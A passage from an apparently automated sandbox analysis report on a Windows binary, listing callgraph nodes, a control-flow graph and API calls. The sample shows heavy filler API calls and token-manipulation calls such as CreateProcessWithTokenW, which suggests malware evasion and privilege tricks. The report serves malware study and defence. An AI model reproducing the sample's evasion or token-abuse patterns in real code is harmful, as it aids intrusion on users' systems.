4372->4374 4375 40567b 10 API calls 4373->4375 4374->4375 4376 405745 RegOpenKeyExA 4375->4376 4377 405735 CancelWaitableTimer OutputDebugStringA 4375->4377 4378 405760 CreateWaitableTimerA 4376->4378 4377->4378 4379 40578c RegOpenKeyExA 4378->4379 4380 40577d CancelWaitableTimer GetLastError 4378->4380 4381 4057a7 FindFirstFileA FindClose CreateWaitableTimerA GetLastError 4379->4381 4380->4381 4382 4057f3 CancelWaitableTimer 4381->4382 4383 4057fc OutputDebugStringA 4381->4383 4384 405803 CreateMutexA 4382->4384 4383->4384 4385 405820 ReleaseMutex 4384->4385 4386 405827 6 API calls 4384->4386 4385->4386 4387 405893 RegOpenKeyExA ReleaseMutex 4386->4387 4388 4058bc GetLastError 4386->4388 4389 4058c7 OutputDebugStringA CreateSemaphoreA OutputDebugStringA ReleaseSemaphore CreateMutexA 4387->4389 4388->4389 4390 405912 ReleaseMutex 4389->4390 4391 40591b RegOpenKeyExA 4389->4391 4392 405935 4390->4392 4391->4392 4393 405942 RegOpenKeyExA 4392->4393 4393->4393 4394 405962 9 API calls 4393->4394 4395 4059f6 GetLastError 4394->4395 4395->4395 4396 405a01 CreateWaitableTimerA OutputDebugStringA 4395->4396 4397 405a26 CancelWaitableTimer 4396->4397 4398 405a39 4396->4398 4399 405a43 35 API calls 4397->4399 4398->4399 4400 405c7e SetEnvironmentVariableA 4399->4400 4400->4400 4401 405c93 15 API calls 4400->4401 4402 405da2 RegOpenKeyExA 4401->4402 4403 405d99 CancelWaitableTimer 4401->4403 4404 405dbd 16 API calls 4402->4404 4403->4404 4405 405ed6 CancelWaitableTimer SetEnvironmentVariableA 4404->4405 4406 405eed 4404->4406 4405->4406 4407 405efa OutputDebugStringA 4406->4407 4407->4407 4408 405f06 10 API calls 4407->4408 4409 405fb1 CancelWaitableTimer OutputDebugStringA 4408->4409 4410 405fbf 21 API calls 4408->4410 4409->4410 4411 406110 OutputDebugStringA 4410->4411 4411->4411 4412 40611c CreateWaitableTimerA GetLastError 4411->4412 4413 406140 CancelWaitableTimer SetEnvironmentVariableA 4412->4413 4414 406157 24 API calls 4412->4414 4413->4414 4415 4062da OutputDebugStringA 4414->4415 4415->4415 4416 4062e6 7 API calls 4415->4416 4417 406361 CreateMutexA 4416->4417 4418 40635a CancelWaitableTimer 4416->4418 4419 406381 GetLastError ReleaseMutex OutputDebugStringA 4417->4419 4420 406399 RegOpenKeyExA 4417->4420 4418->4417 4421 4063b4 CreateWaitableTimerA SetEnvironmentVariableA 4419->4421 4420->4421 4422 4063f3 SetEnvironmentVariableA 4421->4422 4423 4063e3 CancelWaitableTimer OutputDebugStringA 4421->4423 4424 406403 CreateWaitableTimerA GetLastError 4422->4424 4423->4424 4425 406437 OutputDebugStringA 4424->4425 4426 406428 CancelWaitableTimer GetLastError 4424->4426 4427 40643e 10 API calls 4425->4427 4426->4427 4428 4064dc ReleaseMutex RegOpenKeyExA 4427->4428 4429 4064ff SetEnvironmentVariableA OutputDebugStringA 4427->4429 4430 406516 6 API calls 4428->4430 4429->4430 4431 40ed79 47 API calls 4430->4431 4432 406588 4431->4432 4433 40ed79 47 API calls 4432->4433 4434 406598 4433->4434 4435 40ed79 47 API calls 4434->4435 4436 4065a8 4435->4436 4437 40ed79 47 API calls 4436->4437 4438 4065b8 4437->4438 4439 40ed79 47 API calls 4438->4439 4440 4065c8 4439->4440 4441 40ed79 47 API calls 4440->4441 4442 4065d8 4441->4442 4443 40ed79 47 API calls 4442->4443 4444 4065e8 4443->4444 4445 40ed79 47 API calls 4444->4445 4446 4065f8 4445->4446 4447 40ed79 47 API calls 4446->4447 4448 406608 4447->4448 4449 40ed79 47 API calls 4448->4449 4450 406618 4449->4450 4451 40ed79 47 API calls 4450->4451 4452 406628 4451->4452 4453 40ed79 47 API calls 4452->4453 4454 406638 4453->4454 4455 40ed79 47 API calls 4454->4455 4456 406648 4455->4456 4457 40ed79 47 API calls 4456->4457 4458 406658 4457->4458 4459 40ed79 47 API calls 4458->4459 4460 406668 4459->4460 4461 40ed79 47 API calls 4460->4461 4462 406678 4461->4462 4463 40ed79 47 API calls 4462->4463 4464 406688 4463->4464 4465 40ed79 47 API calls 4464->4465 4466 406698 4465->4466 4467 40ed79 47 API calls 4466->4467 4468 4066a8 4467->4468 4469 40ed79 47 API calls 4468->4469 4470 4066b8 4469->4470 4471 40ed79 47 API calls 4470->4471 4472 4066c8 4471->4472 4473 40ed79 47 API calls 4472->4473 4474 4066d8 4473->4474 4475 40ed79 47 API calls 4474->4475 4476 4066e8 4475->4476 4477 40ed79 47 API calls 4476->4477 4478 4066f8 4477->4478 4479 40ed79 47 API calls 4478->4479 4480 406708 4479->4480 4481 40ed79 47 API calls 4480->4481 4482 406718 4481->4482 4483 40ed79 47 API calls 4482->4483 4484 406728 4483->4484 4485 40ed79 47 API calls 4484->4485 4486 406738 4485->4486 4487 40ed79 47 API calls 4486->4487 4488 406748 4487->4488 4489 40ed79 47 API calls 4488->4489 4490 406758 4489->4490 4491 40ed79 47 API calls 4490->4491 4492 406768 4491->4492 4493 40ed79 47 API calls 4492->4493 4494 406778 4493->4494 4495 40ed79 47 API calls 4494->4495 4496 406788 4495->4496 4497 40ed79 47 API calls 4496->4497 4498 406798 4497->4498 4499 40ed79 47 API calls 4498->4499 4500 4067a8 4499->4500 4501 40ed79 47 API calls 4500->4501 4502 4067b8 4501->4502 4503 40ed79 47 API calls 4502->4503 4504 4067c8 4503->4504 4505 40ed79 47 API calls 4504->4505 4506 4067d8 4505->4506 4507 40ed79 47 API calls 4506->4507 4508 4067e8 4507->4508 4509 40ed79 47 API calls 4508->4509 4510 4067f8 4509->4510 4511 40ed79 47 API calls 4510->4511 4512 406808 4511->4512 4513 40ed79 47 API calls 4512->4513 4514 406818 4513->4514 4515 40ed79 47 API calls 4514->4515 4516 406828 4515->4516 4517 40ed79 47 API calls 4516->4517 4518 406838 4517->4518 4519 40ed79 47 API calls 4518->4519 4520 406848 4519->4520 4521 40ed79 47 API calls 4520->4521 4522 406858 4521->4522 4523 40ed79 47 API calls 4522->4523 4524 406868 4523->4524 4525 40ed79 47 API calls 4524->4525 4526 406878 4525->4526 4527 40ed79 47 API calls 4526->4527 4528 406888 4527->4528 4529 40ed79 47 API calls 4528->4529 4530 406898 4529->4530 4531 40ed79 47 API calls 4530->4531 4532 4068a8 4531->4532 4533 40ed79 47 API calls 4532->4533 4534 4068b8 4533->4534 4535 40ed79 47 API calls 4534->4535 4536 4068c8 4535->4536 4537 40ed79 47 API calls 4536->4537 4538 4068d8 4537->4538 4539 40ed79 47 API calls 4538->4539 4540 4068e8 4539->4540 4541 40ed79 47 API calls 4540->4541 4542 4068f8 4541->4542 4543 40ed79 47 API calls 4542->4543 4544 406908 4543->4544 4545 40ed79 47 API calls 4544->4545 4546 406918 4545->4546 4547 40ed79 47 API calls 4546->4547 4548 406928 4547->4548 4549 40ed79 47 API calls 4548->4549 4550 406938 4549->4550 4551 40ed79 47 API calls 4550->4551 4552 406948 4551->4552 4553 40ed79 47 API calls 4552->4553 4554 406958 4553->4554 4555 40ed79 47 API calls 4554->4555 4556 406968 4555->4556 4557 40ed79 47 API calls 4556->4557 4558 406978 4557->4558 4559 40ed79 47 API calls 4558->4559 4560 406988 4559->4560 4561 40ed79 47 API calls 4560->4561 4562 406998 4561->4562 4563 40ed79 47 API calls 4562->4563 4564 4069a8 4563->4564 4565 40ed79 47 API calls 4564->4565 4566 4069b8 4565->4566 4567 40ed79 47 API calls 4566->4567 4568 4069c8 4567->4568 4569 40ed79 47 API calls 4568->4569 4570 4069d3 4569->4570 4571 40ed79 47 API calls 4570->4571 4572 4069de 4571->4572 4573 40ed79 47 API calls 4572->4573 4574 4069e9 4573->4574 4575 40ed79 47 API calls 4574->4575 4576 4069f4 4575->4576 4577 40ed79 47 API calls 4576->4577 4578 4069ff 4577->4578 4579 40ed79 47 API calls 4578->4579 4580 406a0a 4579->4580 4581 40ed79 47 API calls 4580->4581 4582 406a15 4581->4582 4583 40ed79 47 API calls 4582->4583 4584 406a20 4583->4584 4585 40ed79 47 API calls 4584->4585 4586 406a2b 4585->4586 4587 40ed79 47 API calls 4586->4587 4588 406a36 4587->4588 4589 40ed79 47 API calls 4588->4589 4590 406a41 4589->4590 4591 40ed79 47 API calls 4590->4591 4592 406a4c 4591->4592 4593 40ed79 47 API calls 4592->4593 4594 406a57 4593->4594 4595 40ed79 47 API calls 4594->4595 4596 406a62 4595->4596 4597 40ed79 47 API calls 4596->4597 4598 406a6d 4597->4598 4599 40ed79 47 API calls 4598->4599 4600 406a7d 4599->4600 4601 40ed79 47 API calls 4600->4601 4602 406a8d 4601->4602 4603 40ed79 47 API calls 4602->4603 4604 406a98 4603->4604 4605 40ed79 47 API calls 4604->4605 4606 406aa3 4605->4606 4607 40ed79 47 API calls 4606->4607 4608 406aae 4607->4608 4609 40ed79 47 API calls 4608->4609 4610 406ab9 4609->4610 4611 40ed79 47 API calls 4610->4611 4612 406ac4 4611->4612 4613 40ed79 47 API calls 4612->4613 4614 406acf 4613->4614 4615 40ed79 47 API calls 4614->4615 4616 406ada 4615->4616 4617 40ed79 47 API calls 4616->4617 4618 406ae5 4617->4618 4619 40ed79 47 API calls 4618->4619 4620 406af0 4619->4620 4621 40ed79 47 API calls 4620->4621 4622 406afb 4621->4622 4623 40ed79 47 API calls 4622->4623 4624 406b06 4623->4624 4625 40ed79 47 API calls 4624->4625 4626 406b11 4625->4626 4627 40ed79 47 API calls 4626->4627 4628 406b21 4627->4628 4629 40ed79 47 API calls 4628->4629 4630 406b31 4629->4630 4631 40ed79 47 API calls 4630->4631 4632 406b3c 4631->4632 4633 40ed79 47 API calls 4632->4633 4634 406b4c 4633->4634 4635 40ed79 47 API calls 4634->4635 4636 406b57 4635->4636 4637 40ed79 47 API calls 4636->4637 4638 406b67 4637->4638 4639 40ed79 47 API calls 4638->4639 4640 406b77 4639->4640 4641 40ed79 47 API calls 4640->4641 4642 406b87 4641->4642 4643 40ed79 47 API calls 4642->4643 4644 406b97 4643->4644 4645 40ed79 47 API calls 4644->4645 4646 406ba7 4645->4646 4647 40ed79 47 API calls 4646->4647 4648 406bb7 4647->4648 4649 40ed79 47 API calls 4648->4649 4650 406bc7 4649->4650 4651 40ed79 47 API calls 4650->4651 4652 406bd7 4651->4652 4653 40ed79 47 API calls 4652->4653 4654 406be7 4653->4654 4655 40ed79 47 API calls 4654->4655 4656 406bf7 4655->4656 4657 40ed79 47 API calls 4656->4657 4658 406c02 4657->4658 4659 40ed79 47 API calls 4658->4659 4660 406c12 4659->4660 4661 40ed79 47 API calls 4660->4661 4662 406c22 4661->4662 4663 40ed79 47 API calls 4662->4663 4664 406c32 4663->4664 4665 40ed79 47 API calls 4664->4665 4666 406c42 4665->4666 4667 40ed79 47 API calls 4666->4667 4668 406c52 4667->4668 4669 40ed79 47 API calls 4668->4669 4670 406c62 4669->4670 4671 40ed79 47 API calls 4670->4671 4672 406c72 4671->4672 4673 40ed79 47 API calls 4672->4673 4674 406c82 4673->4674 4675 40ed79 47 API calls 4674->4675 4676 406c92 4675->4676 4677 40ed79 47 API calls 4676->4677 4678 406ca2 4677->4678 4679 40ed79 47 API calls 4678->4679 4680 406cb2 4679->4680 4681 40ed79 47 API calls 4680->4681 4682 406cc2 4681->4682 4683 40ed79 47 API calls 4682->4683 4684 406cd2 4683->4684 4685 40ed79 47 API calls 4684->4685 4686 406ce2 4685->4686 4687 40ed79 47 API calls 4686->4687 4688 406cf2 4687->4688 4689 40ed79 47 API calls 4688->4689 4690 406d02 4689->4690 4691 40ed79 47 API calls 4690->4691 4692 406d12 4691->4692 4693 40ed79 47 API calls 4692->4693 4694 406d22 4693->4694 4695 40ed79 47 API calls 4694->4695 4696 406d32 4695->4696 4697 40ed79 47 API calls 4696->4697 4698 406d42 4697->4698 4699 40ed79 47 API calls 4698->4699 4700 406d52 4699->4700 4701 40ed79 47 API calls 4700->4701 4702 406d62 4701->4702 4703 40dff8 CreateSemaphoreA SetEnvironmentVariableA ReleaseSemaphore 4702->4703 4704 40e051 8 API calls 4703->4704 4705 40e036 RegOpenKeyExA 4703->4705 4706 40e0c5 GetLastError 4704->4706 4707 40e0b5 OutputDebugStringA ReleaseMutex 4704->4707 4705->4704 4708 40e0cb CreateWaitableTimerA GetCurrentProcess OpenProcessToken 4706->4708 4707->4708 4709 409e15 4708->4709 4710 40e0f6 GetTokenInformation 4708->4710 4709->4123 4709->4124 4711 40e118 GetTokenInformation 4710->4711 4712 40e10d GetLastError 4710->4712 4711->4709 4714 40e13e 4711->4714 4712->4709 4712->4711 4714->4709 4715 40e152 lstrcmpiW GlobalFree 4714->4715 4715->4709 4717 40dd08 GetLastError 4716->4717 4718 40dd0a CreateMutexA 4716->4718 4717->4718 4719 40dd43 SetEnvironmentVariableA SetEnvironmentVariableA 4718->4719 4720 40dd1f OutputDebugStringA ReleaseMutex SetEnvironmentVariableA 4718->4720 4721 40dd61 4719->4721 4720->4721 4722 409f4a LocalAlloc SetEnvironmentVariableA LocalFree SetEnvironmentVariableA CreateWaitableTimerA 4721->4722 4723 40dd7f lstrlenA 4721->4723 4722->4133 4722->4134 4723->4721 4724 40ddab 6 API calls 4723->4724 4725 40de0d CancelWaitableTimer OutputDebugStringA 4724->4725 4726 40de1f GetLastError CreateFileMappingW 4724->4726 4725->4726 4726->4722 4738 40f012 lstrlenW lstrlenW LocalAlloc 4727->4738 4729 40bc97 4730 40f012 41 API calls 4729->4730 4731 40bca4 4730->4731 4732 40f012 41 API calls 4731->4732 4733 40bcb1 4732->4733 4736 40e3ad 4734->4736 4735 40e483 4735->4124 4736->4735 4737 40e428 CloseHandle GetModuleFileNameW CreateProcessWithTokenW CloseHandle 4736->4737 4737->4736 4754 40169e 4738->4754 4740 40f05e 12 API calls 4741 40f0f5 SetEnvironmentVariableA ReleaseMutex SetEnvironmentVariableA 4740->4741 4742 40f118 GetLastError 4740->4742 4743 40f11a 4741->4743 4742->4743 4744 40f128 CreateWaitableTimerA GetLastError 4743->4744 4745 40f14d 4744->4745 4746 40f13f CancelWaitableTimer OutputDebugStringA 4744->4746 4747 40f150 GetLastError 4745->4747 4746->4745 4747->4747 4748 40f157 8 API calls 4747->4748 4749 40f1cd CreateSemaphoreA ReleaseSemaphore OutputDebugStringA CreateMutexA 4748->4749 4750 40f1bd SetEnvironmentVariableA 4748->4750 4751 40f203 RegOpenKeyExA 4749->4751 4752 40f1fa ReleaseMutex 4749->4752 4750->4749 4753 40f21d LocalAlloc GlobalFree 4751->4753 4752->4753 4753->4729 4755 4016a5 4754->4755 4755->4740

                                                                Callgraph

                                                                • Executed
                                                                • Not Executed
                                                                • Opacity -> Relevance
                                                                • Disassembly available
                                                                callgraph 0 Function_0040DE44 1 Function_004070C9 1->1 5 Function_004016CB 1->5 11 Function_0040FB52 1->11 46 Function_0040F788 1->46 54 Function_0040F012 1->54 83 Function_0040E83D 1->83 2 Function_0040DC49 3 Function_0040D24A 3->54 4 Function_0040194A 4->4 4->5 19 Function_00401C5E 4->19 72 Function_0040172E 4->72 5->72 6 Function_00401ACC 33 Function_0040ED79 6->33 41 Function_0040E2FE 6->41 7 Function_0040CECF 7->54 8 Function_0040DED0 9 Function_00404B50 9->33 10 Function_00409452 10->33 38 Function_004084FB 10->38 10->46 10->54 37 Function_0040EB7B 11->37 12 Function_00410952 12->5 12->11 12->12 12->46 12->54 12->83 13 Function_0040CA58 13->5 13->11 13->13 13->46 13->54 13->83 14 Function_0040C15A 15 Function_0040B3DA 14->15 30 Function_0040DE71 14->30 39 Function_0040BC7D 14->39 14->46 14->54 68 Function_0040C02D 14->68 15->33 15->54 79 Function_0040F23A 15->79 16 Function_00409ADC 16->2 16->8 16->9 16->14 17 Function_0040F75C 16->17 18 Function_0040AF5D 16->18 21 Function_0040D5E0 16->21 22 Function_004103E1 16->22 27 Function_0040FFE8 16->27 28 Function_00406D6E 16->28 29 Function_0040F4F1 16->29 32 Function_0040DFF8 16->32 16->33 16->37 16->39 40 Function_0040C6FE 16->40 43 Function_00401000 16->43 47 Function_00408109 16->47 50 Function_0040E48D 16->50 51 Function_0040E38D 16->51 16->54 55 Function_00404994 16->55 60 Function_00404A1F 16->60 62 Function_0040739F 16->62 65 Function_0040D8AA 16->65 73 Function_004083AE 16->73 82 Function_0040C0BD 16->82 84 Function_0040973E 16->84 86 Function_0040BCBF 16->86 19->6 19->15 19->30 35 Function_0040E179 19->35 19->39 44 Function_00402C05 19->44 49 Function_0040318A 19->49 19->54 61 Function_00403E9F 19->61 63 Function_00402723 19->63 69 Function_004041AD 19->69 76 Function_004036B6 19->76 80 Function_004044BB 19->80 20 Function_004105DE 20->20 20->46 20->54 20->83 21->3 21->7 21->15 23 Function_0040D163 21->23 25 Function_0040CE65 21->25 21->30 31 Function_0040D0F5 21->31 21->37 21->39 21->54 56 Function_0040CF9A 21->56 64 Function_0040CDA5 21->64 67 Function_0040CD2D 21->67 71 Function_0040CF2E 21->71 22->15 22->20 22->30 22->39 22->54 23->54 24 Function_00407DE4 24->37 24->54 77 Function_00407938 24->77 25->54 26 Function_00403BE6 26->46 26->54 27->12 27->15 27->30 27->37 27->39 27->54 28->1 28->15 28->30 28->37 28->39 28->54 30->0 31->54 34 Function_0040BAF9 36 Function_00401779 38->46 38->54 39->54 40->13 40->15 40->30 40->37 40->39 40->54 42 Function_00408B7F 42->46 42->54 44->33 44->36 44->46 44->54 78 Function_00401639 44->78 85 Function_004015BE 44->85 45 Function_0040DC05 46->30 46->50 46->54 47->5 47->47 66 Function_004087AA 47->66 47->72 48 Function_00415288 49->33 49->36 49->46 49->54 49->78 49->85 50->54 52 Function_0040ED0E 53 Function_0040BF90 54->5 59 Function_0040169E 54->59 55->4 75 Function_004017B3 55->75 56->33 56->54 57 Function_0040929E 57->46 57->54 58 Function_0040FC1E 59->72 60->37 60->58 61->26 61->37 61->54 62->15 62->24 62->30 62->37 62->39 62->54 63->33 63->36 63->46 63->54 63->78 63->85 64->54 65->1 65->15 65->30 65->37 65->39 65->54 66->10 66->15 66->30 66->39 66->42 66->54 66->57 74 Function_00408DB2 66->74 67->54 68->53 69->37 69->54 70 Function_0040392D 69->70 70->46 70->54 71->54 74->46 74->52 74->54 81 Function_0040823C 74->81 75->5 75->19 75->72 75->75 76->46 76->54 77->5 77->11 77->46 77->54 77->77 77->83 87 Function_0040C63F 77->87 79->45 80->33 80->36 80->46 80->54 80->78 80->85 82->37 83->37 83->54 84->30 84->34 84->37 84->39 84->54 86->34 86->37 86->39 86->54

                                                                Executed Functions

                                                                Function 00404B50 Relevance: 1398.7, APIs: 399, Strings: 399, Instructions: 2176timesynchronizationregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 404b50-404c33 CreateSemaphoreA ReleaseSemaphore CreateMutexA CreateFileMappingW RegOpenKeyExA CloseHandle CreateEventA SetEvent ResetEvent FindFirstFileA FindClose CreateMutexA 1 404c35-404c3c ReleaseMutex 0->1 2 404c3e-404c53 RegOpenKeyExA 0->2 3 404c59-404c79 CreateSemaphoreA ReleaseSemaphore 1->3 2->3 4 404c81-404d81 CreateFileMappingW FindFirstFileA FindClose CreateEventA SetEvent ResetEvent CreateEventA SetEvent ResetEvent LocalAlloc GetLastError LocalFree LocalAlloc LocalFree GetLastError CreateSemaphoreA ReleaseSemaphore 3->4 5 404c7b GetLastError 3->5 6 404d83-404d8a OutputDebugStringA 4->6 7 404d8c-404d96 SetEnvironmentVariableA 4->7 5->4 8 404d9c-404dce CreateWaitableTimerA SetEnvironmentVariableA 6->8 7->8 9 404dd0-404dd1 CancelWaitableTimer 8->9 10 404dd7-404ef4 CreateWaitableTimerA GetLastError CancelWaitableTimer CreateWaitableTimerA RegOpenKeyExA CancelWaitableTimer CreateSemaphoreA GetLastError ReleaseSemaphore LocalAlloc LocalFree OutputDebugStringA CreateWaitableTimerA OutputDebugStringA CancelWaitableTimer SetEnvironmentVariableA CreateWaitableTimerA OutputDebugStringA 8->10 9->10 11 404ef6-404ef7 CancelWaitableTimer 10->11 12 404efd-404f3b FindFirstFileA FindClose CreateMutexA 10->12 11->12 13 404f44-404f7c CreateFileMappingW CloseHandle OutputDebugStringA 12->13 14 404f3d-404f3e ReleaseMutex 12->14 15 404f7d-404f87 OutputDebugStringA 13->15 14->13 15->15 16 404f89-404fcd CreateWaitableTimerA CancelWaitableTimer CreateMutexA CreateWaitableTimerA 15->16 17 404fe6-405072 CreateFileMappingW FindCloseChangeNotification CreateMutexA CreateWaitableTimerA SetEnvironmentVariableA CancelWaitableTimer CreateWaitableTimerA OutputDebugStringA 16->17 18 404fcf-404fe0 CancelWaitableTimer SetEnvironmentVariableA 16->18 19 405074-405077 CancelWaitableTimer 17->19 20 405079 GetLastError 17->20 18->17 21 40507f-40516a SetEnvironmentVariableA * 2 CreateFileMappingW SetEnvironmentVariableA FindCloseChangeNotification FindFirstFileA FindClose CreateSemaphoreA RegOpenKeyExA ReleaseSemaphore CreateMutexA 19->21 20->21 22 405184-405199 RegOpenKeyExA 21->22 23 40516c-405182 GetLastError ReleaseMutex OutputDebugStringA 21->23 24 40519f-4051ba CreateWaitableTimerA 22->24 23->24 25 4051c5-4051cf SetEnvironmentVariableA 24->25 26 4051bc-4051c3 CancelWaitableTimer 24->26 27 4051d5-4051f5 CreateSemaphoreA ReleaseSemaphore 25->27 26->27 28 405212-4052fc CreateSemaphoreA ReleaseSemaphore SetEnvironmentVariableA CreateWaitableTimerA CancelWaitableTimer RegOpenKeyExA CreateSemaphoreA OutputDebugStringA ReleaseSemaphore CreateFileMappingW FindCloseChangeNotification CreateWaitableTimerA CreateSemaphoreA ReleaseSemaphore 27->28 29 4051f7-40520c RegOpenKeyExA 27->29 30 405318-40535e FindFirstFileA FindClose CreateMutexA 28->30 31 4052fe-405312 RegOpenKeyExA 28->31 29->28 32 405360-40536c ReleaseMutex 30->32 33 40536e-405388 RegOpenKeyExA 30->33 31->30 34 40538d-405425 OutputDebugStringA CreateFileMappingW FindCloseChangeNotification CreateFileMappingW RegOpenKeyExA CloseHandle LocalAlloc CreateMutexA 32->34 33->34 35 405445-405469 CreateWaitableTimerA OutputDebugStringA 34->35 36 405427-40543f OutputDebugStringA ReleaseMutex SetEnvironmentVariableA 34->36 37 405472-4054ef CreateSemaphoreA ReleaseSemaphore OutputDebugStringA CreateSemaphoreA ReleaseSemaphore RegOpenKeyExA CreateMutexA 35->37 38 40546b-40546c CancelWaitableTimer 35->38 36->35 39 4054f1-4054f2 ReleaseMutex 37->39 40 4054f8-4055c4 LocalAlloc RegOpenKeyExA LocalFree CreateFileMappingW RegOpenKeyExA FindCloseChangeNotification CreateEventA SetEvent ResetEvent CreateMutexA 37->40 38->37 39->40 41 4055c6-4055cd ReleaseMutex 40->41 42 4055cf-4055e0 OutputDebugStringA SetEnvironmentVariableA 40->42 43 4055e6-405656 CreateSemaphoreA OutputDebugStringA ReleaseSemaphore RegOpenKeyExA CreateSemaphoreA ReleaseSemaphore 41->43 42->43 44 405675 GetLastError 43->44 45 405658-405673 RegOpenKeyExA 43->45 46 40567b-405733 CreateSemaphoreA ReleaseSemaphore CreateWaitableTimerA CreateFileMappingW OutputDebugStringA FindCloseChangeNotification CreateSemaphoreA ReleaseSemaphore CreateWaitableTimerA SetEnvironmentVariableA 44->46 45->46 47 405745-40575a RegOpenKeyExA 46->47 48 405735-405743 CancelWaitableTimer OutputDebugStringA 46->48 49 405760-40577b CreateWaitableTimerA 47->49 48->49 50 40578c-4057a1 RegOpenKeyExA 49->50 51 40577d-40578a CancelWaitableTimer GetLastError 49->51 52 4057a7-4057f1 FindFirstFileA FindClose CreateWaitableTimerA GetLastError 50->52 51->52 53 4057f3-4057fa CancelWaitableTimer 52->53 54 4057fc-405801 OutputDebugStringA 52->54 55 405803-40581e CreateMutexA 53->55 54->55 56 405820-405821 ReleaseMutex 55->56 57 405827-405891 CreateSemaphoreA ReleaseSemaphore LocalAlloc FindFirstFileA FindClose CreateMutexA 55->57 56->57 58 405893-4058ba RegOpenKeyExA ReleaseMutex 57->58 59 4058bc-4058c2 GetLastError 57->59 60 4058c7-405910 OutputDebugStringA CreateSemaphoreA OutputDebugStringA ReleaseSemaphore CreateMutexA 58->60 59->60 61 405912-405919 ReleaseMutex 60->61 62 40591b-40592f RegOpenKeyExA 60->62 63 405935-405941 61->63 62->63 64 405942-405960 RegOpenKeyExA 63->64 64->64 65 405962-4059f5 CreateSemaphoreA ReleaseSemaphore GetLastError CreateWaitableTimerA CreateEventA SetEvent ResetEvent CreateSemaphoreA ReleaseSemaphore 64->65 66 4059f6-4059ff GetLastError 65->66 66->66 67 405a01-405a24 CreateWaitableTimerA OutputDebugStringA 66->67 68 405a26-405a37 CancelWaitableTimer 67->68 69 405a39-405a3e 67->69 70 405a43-405c7d SetEnvironmentVariableA CreateEventA SetEvent ResetEvent CreateSemaphoreA ReleaseSemaphore OutputDebugStringA CreateFileMappingW FindCloseChangeNotification LocalAlloc CreateEventA * 2 SetEvent ResetEvent CreateFileMappingW GetLastError CloseHandle CreateSemaphoreA ReleaseSemaphore SetEnvironmentVariableA CreateEventA SetEvent ResetEvent CreateSemaphoreA RegOpenKeyExA ReleaseSemaphore GetLastError CreateFileMappingW CloseHandle SetEnvironmentVariableA CreateEventA SetEvent ResetEvent CreateFileMappingW CloseHandle 68->70 69->70 71 405c7e-405c91 SetEnvironmentVariableA 70->71 71->71 72 405c93-405d97 CreateSemaphoreA ReleaseSemaphore RegOpenKeyExA CreateEventA SetEvent ResetEvent CreateSemaphoreA ReleaseSemaphore OutputDebugStringA CreateSemaphoreA OutputDebugStringA ReleaseSemaphore GetLastError CreateWaitableTimerA SetEnvironmentVariableA 71->72 73 405da2-405db7 RegOpenKeyExA 72->73 74 405d99-405da0 CancelWaitableTimer 72->74 75 405dbd-405ed4 CreateFileMappingW SetEnvironmentVariableA FindCloseChangeNotification CreateFileMappingW GetLastError CloseHandle CreateSemaphoreA SetEnvironmentVariableA ReleaseSemaphore FindFirstFileA FindClose CreateFileMappingW CloseHandle CreateWaitableTimerA GetLastError CreateWaitableTimerA 73->75 74->75 76 405ed6-405ee7 CancelWaitableTimer SetEnvironmentVariableA 75->76 77 405eed-405ef9 75->77 76->77 78 405efa-405f04 OutputDebugStringA 77->78 78->78 79 405f06-405faf FindFirstFileA FindClose CreateFileMappingW OutputDebugStringA CloseHandle OutputDebugStringA CreateEventA SetEvent ResetEvent CreateWaitableTimerA 78->79 80 405fb1-405fbd CancelWaitableTimer OutputDebugStringA 79->80 81 405fbf-40610f CreateSemaphoreA CreateFileMappingW OutputDebugStringA FindCloseChangeNotification LocalAlloc SetEnvironmentVariableA LocalFree CreateSemaphoreA ReleaseSemaphore LocalAlloc CreateFileMappingW CloseHandle LocalAlloc CreateSemaphoreA SetEnvironmentVariableA ReleaseSemaphore CreateEventA SetEvent ResetEvent CreateSemaphoreA ReleaseSemaphore 79->81 80->81 82 406110-40611a OutputDebugStringA 81->82 82->82 83 40611c-40613e CreateWaitableTimerA GetLastError 82->83 84 406140-406151 CancelWaitableTimer SetEnvironmentVariableA 83->84 85 406157-4062d9 LocalAlloc OutputDebugStringA LocalFree CreateWaitableTimerA OutputDebugStringA CancelWaitableTimer LocalAlloc LocalFree CreateSemaphoreA ReleaseSemaphore FindFirstFileA * 2 FindClose FindFirstFileA FindClose CreateEventA SetEvent ResetEvent LocalAlloc RegOpenKeyExA LocalFree CreateFileMappingW SetEnvironmentVariableA CloseHandle 83->85 84->85 86 4062da-4062e4 OutputDebugStringA 85->86 86->86 87 4062e6-406358 CreateSemaphoreA ReleaseSemaphore OutputDebugStringA FindFirstFileA FindClose CreateWaitableTimerA OutputDebugStringA 86->87 88 406361-40637f CreateMutexA 87->88 89 40635a-40635b CancelWaitableTimer 87->89 90 406381-406397 GetLastError ReleaseMutex OutputDebugStringA 88->90 91 406399-4063ae RegOpenKeyExA 88->91 89->88 92 4063b4-4063e1 CreateWaitableTimerA SetEnvironmentVariableA 90->92 91->92 93 4063f3-4063fd SetEnvironmentVariableA 92->93 94 4063e3-4063f1 CancelWaitableTimer OutputDebugStringA 92->94 95 406403-406426 CreateWaitableTimerA GetLastError 93->95 94->95 96 406437-40643c OutputDebugStringA 95->96 97 406428-406435 CancelWaitableTimer GetLastError 95->97 98 40643e-4064da CreateWaitableTimerA OutputDebugStringA CancelWaitableTimer CreateFileMappingW FindCloseChangeNotification CreateWaitableTimerA CreateSemaphoreA ReleaseSemaphore GetLastError CreateMutexA 96->98 97->98 99 4064dc-4064fd ReleaseMutex RegOpenKeyExA 98->99 100 4064ff-406514 SetEnvironmentVariableA OutputDebugStringA 98->100 101 406516-406d6d CreateFileMappingW CloseHandle SetEnvironmentVariableA CreateWaitableTimerA CancelWaitableTimer CreateEventA call 40ed79 * 136 99->101 100->101
                                                                APIs
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLu4fdevhq), ref: 00404B6D
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00404B79
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXq1n7w3bt), ref: 00404B82
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000000C3,00000000), ref: 00404B9E
                                                                • RegOpenKeyExA.KERNEL32(80000001,reg0l6t893i,00000000,00020019,?), ref: 00404BBB
                                                                • CloseHandle.KERNEL32(00000000), ref: 00404BC2
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_h08jrwbj), ref: 00404BDD
                                                                • SetEvent.KERNEL32(00000000), ref: 00404BE6
